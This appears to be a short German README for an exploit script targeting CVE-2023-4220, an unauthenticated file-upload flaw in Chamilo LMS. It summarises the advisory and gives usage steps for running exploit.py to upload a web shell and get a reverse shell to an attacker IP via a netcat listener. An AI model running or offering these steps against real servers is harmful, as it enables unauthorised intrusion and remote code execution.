CVE-2023-4220-RCE
Zusammenfassung
Starlabs Sicherheitshinweis
- Betroffenes Produkt: Chamilo <= v1.11.24
- Beschreibung: Unbeschränkter Dateiupload in der Big-Upload-Funktionalität in /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24 erlaubt nicht authentifizierten Angreifern, Cross-Site-Scripting-Angriffe durchzuführen und über das Hochladen einer Web-Shell Remote-Code-Ausführung zu erlangen.
- CVSS-Score: 8.1 (Hoch)
Verwendung
- Richten Sie einen Netcat-Listener ein (wenn Sie eine Reverse-Shell wünschen)
- Führen Sie den Exploit aus
python3 exploit.py -u --url <REMOTE HOST>, -p --port [REMOTE PORT] -c --comand <COMMAND>
- Flags für Reverse-Shell
- -lh/--localhost: Angreifer-IP
- **-lp/--localtcat Listener-Port